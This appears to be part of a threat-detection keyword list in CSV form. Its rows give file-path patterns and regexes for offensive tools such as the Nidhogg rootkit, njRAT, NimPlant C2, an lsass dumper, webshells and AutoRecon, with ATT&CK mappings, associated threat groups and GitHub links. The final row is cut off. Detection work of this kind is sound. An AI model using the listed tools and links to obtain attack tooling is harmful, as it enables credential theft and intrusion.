"*\Nidhogg.sys*",".{0,1000}\\Nidhogg\.sys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16860" "*\NidhoggClient.exe*",".{0,1000}\\NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16861" "*\NidhoggClient\*",".{0,1000}\\NidhoggClient\\.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16862" "*\nightCrawler.ps1*",".{0,1000}\\nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","16863" "*\nikto.py*",".{0,1000}\\nikto\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16864" "*\NimBlackout*",".{0,1000}\\NimBlackout.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","16865" "*\NimDllSideload\*",".{0,1000}\\NimDllSideload\\.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","16866" "*\Nimperiments-main*",".{0,1000}\\Nimperiments\-main.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","16867" "*\NimPlant.*",".{0,1000}\\NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059.001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","16868" "*\nimproxydll\*",".{0,1000}\\nimproxydll\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","16869" 
"*\nimproxydll-main\*",".{0,1000}\\nimproxydll\-main\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","16870" "*\Ninja.py*",".{0,1000}\\Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","16873" "*\NIX REMOTE WEB-SHELL.php*",".{0,1000}\\NIX\sREMOTE\sWEB\-SHELL\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16878" "*\NJRAT 7.exe*",".{0,1000}\\NJRAT\s7\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27 - APT-C-36","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16879" "*\njRat Lime Edition 
*.exe*",".{0,1000}\\njRat\sLime\sEdition\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16880" "*\njRAT v*.exe*",".{0,1000}\\njRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16881" "*\njRAT.exe*",".{0,1000}\\njRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 
- T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16882" "*\njworm.exe*",".{0,1000}\\njworm\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16883" "*\NLBrute*.rar*",".{0,1000}\\NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16884" "*\NLBrute*.zip*",".{0,1000}\\NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16885" "*\NLBrute.exe*",".{0,1000}\\NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16886" "*\nmap-ajp.py*",".{0,1000}\\nmap\-ajp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16888" "*\nmapAnswerMachine.exe*",".{0,1000}\\nmapAnswerMachine\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16889" "*\nmapAnswerMachine.py*",".{0,1000}\\nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16890" "*\nmap-cassandra.py*",".{0,1000}\\nmap\-cassandra\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16891" "*\nmap-cups.py*",".{0,1000}\\nmap\-cups\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16892" "*\nmap-distccd.py*",".{0,1000}\\nmap\-distccd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16893" "*\nmap-dns.py*",".{0,1000}\\nmap\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16894" "*\nmap-finger.py*",".{0,1000}\\nmap\-finger\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16895" "*\nmap-ftp.py*",".{0,1000}\\nmap\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16896" "*\nmap-http.py*",".{0,1000}\\nmap\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16897" "*\nmap-imap.py*",".{0,1000}\\nmap\-imap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which 
performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16898" "*\nmap-irc.py*",".{0,1000}\\nmap\-irc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16899" "*\nmap-kerberos.py*",".{0,1000}\\nmap\-kerberos\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16900" "*\nmap-ldap.py*",".{0,1000}\\nmap\-ldap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16901" "*\nmap-mongodb.py*",".{0,1000}\\nmap\-mongodb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16902" 
"*\nmap-mountd.py*",".{0,1000}\\nmap\-mountd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16903" "*\nmap-msrpc.py*",".{0,1000}\\nmap\-msrpc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16904" "*\nmap-mssql.py*",".{0,1000}\\nmap\-mssql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16905" "*\nmap-multicast-dns.py*",".{0,1000}\\nmap\-multicast\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16906" "*\nmap-mysql.py*",".{0,1000}\\nmap\-mysql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16907" "*\nmap-nfs.py*",".{0,1000}\\nmap\-nfs\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16908" "*\nmap-nntp.py*",".{0,1000}\\nmap\-nntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16909" "*\nmap-ntp.py*",".{0,1000}\\nmap\-ntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16910" "*\nmap-oracle.py*",".{0,1000}\\nmap\-oracle\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16911" "*\nmap-pop3.py*",".{0,1000}\\nmap\-pop3\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which 
performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16912" "*\nmap-rdp.py*",".{0,1000}\\nmap\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16913" "*\nmap-redis.py*",".{0,1000}\\nmap\-redis\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16914" "*\nmap-rmi.py*",".{0,1000}\\nmap\-rmi\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16915" "*\nmap-rsync.py*",".{0,1000}\\nmap\-rsync\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16916" 
"*\nmap-sip.py*",".{0,1000}\\nmap\-sip\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16917" "*\nmap-smb.py*",".{0,1000}\\nmap\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16918" "*\nmap-smtp.py*",".{0,1000}\\nmap\-smtp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16919" "*\nmap-snmp.py*",".{0,1000}\\nmap\-snmp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16920" "*\nmap-ssh.py*",".{0,1000}\\nmap\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16921" "*\nmap-telnet.py*",".{0,1000}\\nmap\-telnet\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16922" "*\nmap-tftp.py*",".{0,1000}\\nmap\-tftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16923" "*\nmap-vnc.py*",".{0,1000}\\nmap\-vnc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 